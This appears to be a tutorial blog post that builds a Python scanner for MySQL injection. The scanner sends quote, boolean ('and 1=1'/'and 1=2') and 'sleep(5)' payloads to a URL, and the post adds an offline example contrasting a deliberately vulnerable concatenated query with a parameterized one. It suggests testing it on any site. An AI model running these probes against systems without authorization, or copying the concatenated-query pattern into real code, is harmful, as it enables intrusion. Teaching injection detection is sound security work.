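Python: writing a MySQL injection vulnerability detection tool

Several ways to tell whether a MySQL-backed website has an injection vulnerability:

  1. Appending a single quote after the injection point causes an error
  2. `and 1=1` returns the normal page, while `and 1=2` returns a page that differs from the normal page
  3. With `and sleep(3)` the page waits for about 3 seconds

From how the returned page behaves, we can tell whether an injection vulnerability exists.

To find out whether the returned pages are the same, we can compare the Content-Length value in the headers.

Knowing this, we can write a simple Python script to test it.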

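# -*- coding:utf-8 -*-
__author__ = "MuT6 Sch01aR"

import requests
import argparse
import time

# Seconds to wait for a response; must be longer than the sleep(5) delay in way_2.
TIMEOUT = 15

def argparse_option():
    parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')
    parser.add_argument('-u','--url',help='The Url To Check')
    args = parser.parse_args()
    return args

def body_length(r):
    # Content-Length is missing on chunked responses; without a fallback every
    # comparison would be None against None and nothing would ever be reported.
    h = r.headers.get('Content-Length')
    return h if h is not None else str(len(r.content))

def way_1(url):
    # Boolean check: "and 1=1" should match the normal page, "and 1=2" should not.
    payload = [' and 1=1',' and 1=2']
    url_1 = url+payload[0]
    url_2 = url+payload[1]
    r = requests.get(url=url, timeout=TIMEOUT)
    r_1 = requests.get(url=url_1, timeout=TIMEOUT)
    r_2 = requests.get(url=url_2, timeout=TIMEOUT)
    h = body_length(r)
    h_1 = body_length(r_1)
    h_2 = body_length(r_2)
    if h == h_1 and h != h_2:
        print("[*] %s can be injected" % url)
    else:
        way_2(url)

def way_2(url):
    # Time check: the response should be delayed by the sleep() duration.
    payload = ' and sleep(5)'
    t1 = time.time()
    requests.get(url=url+payload, timeout=TIMEOUT)
    t2 = time.time()
    if t2-t1 > 5:
        print("[*] %s can be injected" % url)
    else:
        way_3(url)

def way_3(url):
    # Quote check: a trailing single quote should change the returned page.
    payload = "'"
    url_1 = url+payload
    r = requests.get(url=url, timeout=TIMEOUT)
    r_1 = requests.get(url=url_1, timeout=TIMEOUT)
    h = body_length(r)
    h_1 = body_length(r_1)
    if h != h_1:
        print("[*] %s can be injected" % url)
    else:
        print("[!] %s can't be injected" % url)

if __name__ == '__main__':
    cmd_args = argparse_option()
    url = cmd_args.url
    if url:
        try:
            way_1(url)
        except requests.RequestException as e:
            # Connection errors and timeouts end the check instead of a traceback.
            print("[!] request failed: %s" % e)
    else:
        print("Usage:python3 main.py -u [url]")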

Find a site and test it.

For now this script can only check simple links; URLs with multiple parameters cannot be checked yet.
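
Why the length comparison works, and where it misleads, shown as an added example that is not part of the original post: a string-concatenated query and a parameterized one are put through checks 1 and 2 from the list above. The table, the page functions and the use of sqlite3 as an offline stand-in for MySQL are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for MySQL so this runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "first post"), (2, "second post")])
    return db

def render(rows):
    return "<h1>%s</h1>" % (rows[0][0] if rows else "not found")

def page_concatenated(db, id_param):
    # Vulnerable pattern: the parameter becomes part of the SQL text.
    try:
        rows = db.execute("SELECT title FROM news WHERE id = " + id_param).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc
    return render(rows)

def page_parameterized(db, id_param):
    # Hardened pattern: reject non-numeric ids, bind the value as data.
    if not id_param.isdigit():
        return render([])
    rows = db.execute("SELECT title FROM news WHERE id = ?",
                      (int(id_param),)).fetchall()
    return render(rows)

def length_signals(page, db, id_param="1"):
    # Checks 1 and 2 from the list above, comparing response body lengths.
    base = len(page(db, id_param))
    same_on_true = base == len(page(db, id_param + " and 1=1"))
    differs_on_false = base != len(page(db, id_param + " and 1=2"))
    differs_on_quote = base != len(page(db, id_param + "'"))
    return {"boolean": same_on_true and differs_on_false,
            "quote": differs_on_quote}

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", length_signals(page_concatenated, db))
    print("parameterized:", length_signals(page_parameterized, db))
```

The parameterized page still trips the quote check, because rejecting the malformed id changes the page length; only the `and 1=1` / `and 1=2` pair separates the two implementations here.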
